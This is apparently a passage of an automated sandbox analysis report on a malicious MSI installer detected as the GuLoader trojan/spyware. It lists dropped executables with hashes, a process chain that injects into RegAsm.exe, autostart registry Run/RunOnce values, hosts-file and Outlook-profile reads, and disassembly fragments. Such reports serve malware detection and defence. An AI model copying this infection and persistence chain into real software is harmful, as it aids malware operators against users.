Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012D7910	22_2_012D7910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012DF190	22_2_012DF190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012DC420	22_2_012DC420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012D0B28	22_2_012D0B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012D9378	22_2_012D9378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012D4FE0	22_2_012D4FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012D66C0	22_2_012D66C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012DD516	22_2_012DD516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012DD1A6	22_2_012DD1A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012DC831	22_2_012DC831
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_012DD0A4	22_2_012DD0A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_013865F8	22_2_013865F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_01384490	22_2_01384490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_01385CD4	22_2_01385CD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_01389717	22_2_01389717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_013839B0	22_2_013839B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_01380030	22_2_01380030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0138B850	22_2_0138B850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_01380040	22_2_01380040

Source: Joe Sandbox View	Dropped File: C:\Users\user\Afkodedes8\asparagussens.exe C6D5DDE1A7608F08848860E1C0EB75EB1C489200494E781476F05BC356A3F1CA
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\ota.exe C6D5DDE1A7608F08848860E1C0EB75EB1C489200494E781476F05BC356A3F1CA

Source: ota.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: asparagussens.exe.14.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: ot.msi

Binary or memory string: OriginalFilenameMandfolkene7.exe vs ot.msi

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll

Source: classification engine

Classification label: mal100.troj.spyw.evad.winMSI@19/5@6/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\Afkodedes8

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5404:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5008:120:WilError_01
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Mutant created: \Sessions\1\BaseNamedObjects\nxADcmgE
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1036:120:WilError_01

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

File created: C:\Users\user\AppData\Local\Temp\Lageradministrationernes5

Jump to behavior

Source: C:\Windows\Installer\MSI7397.tmp	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: ot.msi

Static file information: TRID: Microsoft Windows Installer (77509/1) 90.64%

Source: unknown	Process created: C:\Windows\System32\msiexec.exe 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\ot.msi'
Source: unknown	Process created: C:\Windows\Installer\MSI7397.tmp C:\Windows\Installer\MSI7397.tmp
Source: C:\Windows\Installer\MSI7397.tmp	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Windows\Installer\MSI7397.tmp
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process created: C:\Users\user\AppData\Local\Temp\ota.exe 'C:\Users\user\AppData\Local\Temp\ota.exe'
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\AppData\Local\Temp\ota.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Afkodedes8\asparagussens.exe 'C:\Users\user\Afkodedes8\asparagussens.exe'
Source: unknown	Process created: C:\Users\user\Afkodedes8\asparagussens.exe 'C:\Users\user\Afkodedes8\asparagussens.exe'
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Afkodedes8\asparagussens.exe'
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Afkodedes8\asparagussens.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Afkodedes8\asparagussens.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Installer\MSI7397.tmp	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Windows\Installer\MSI7397.tmp	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process created: C:\Users\user\AppData\Local\Temp\ota.exe 'C:\Users\user\AppData\Local\Temp\ota.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\AppData\Local\Temp\ota.exe'	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Afkodedes8\asparagussens.exe'	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Afkodedes8\asparagussens.exe'	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Afkodedes8\asparagussens.exe'	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4800, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5612, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1048, type: MEMORY

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 4_2_00874B2C LoadLibraryA,GetProcAddress,

4_2_00874B2C

Source: C:\Users\user\AppData\Local\Temp\ota.exe	Code function: 12_2_02322412 push 95CFAB99h; iretd	12_2_023225E2
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Code function: 12_2_0232409F push edx; ret	12_2_023240A0
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Code function: 12_2_02322CD8 push ecx; ret	12_2_02322CD9
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Code function: 12_2_023214C0 push ecx; ret	12_2_023214C1
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Code function: 12_2_0232056C push eax; ret	12_2_0232056D
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Code function: 12_2_02323392 push ss; ret	12_2_023233B5
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Code function: 12_2_023215E4 push ecx; ret	12_2_023215E5
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Code function: 12_2_023203EC push eax; ret	12_2_023203ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_009440B1 push ecx; ret	14_2_00944080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_0094403E push ecx; ret	14_2_00944080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_00943F87 push ds; retf	14_2_00943F9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_1D40C550 push ds; ret	14_2_1D40C583
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 19_2_0211409F push edx; ret	19_2_021140A0
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 19_2_02112CD8 push ecx; ret	19_2_02112CD9
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 19_2_021114C0 push ecx; ret	19_2_021114C1
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 19_2_02113392 push ss; ret	19_2_021133B5
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 19_2_021115A3 push ecx; ret	19_2_021115E5
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 19_2_021115E6 push ecx; ret	19_2_021115E5
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 20_2_020D3E34 push eax; ret	20_2_020D3E35
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 20_2_020D3C64 push ebx; ret	20_2_020D3C65
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 20_2_020D409E push edx; ret	20_2_020D40A0
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 20_2_020D14C0 push ecx; ret	20_2_020D14C1
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 20_2_020D2CD8 push ecx; ret	20_2_020D2CD9
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 20_2_020D1D4F pushfd ; ret	20_2_020D1D59
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 20_2_020D056C push eax; ret	20_2_020D056D
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 20_2_020D03EC push eax; ret	20_2_020D03ED
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Code function: 20_2_020D15E4 push ecx; ret	20_2_020D15E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_3_00E70801 pushfd ; ret	22_3_00E70802
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00F040B1 push ecx; ret	22_2_00F04080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00F0403E push ecx; ret	22_2_00F04080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00F03F87 push ds; retf	22_2_00F03F9F

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File created: C:\Users\user\AppData\Local\Temp\ota.exe			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\Afkodedes8\asparagussens.exe			Jump to dropped file

Boot Survival:

Creates multiple autostart registry keys

Show sources

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run udviklingspsykologisk			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce notabiliteternes			Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run udviklingspsykologisk	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run udviklingspsykologisk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce notabiliteternes	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce notabiliteternes	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce notabiliteternes	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce notabiliteternes	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI7397.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI7397.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI7397.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI7397.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI7397.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI7397.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI7397.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI7397.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Installer\MSI7397.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
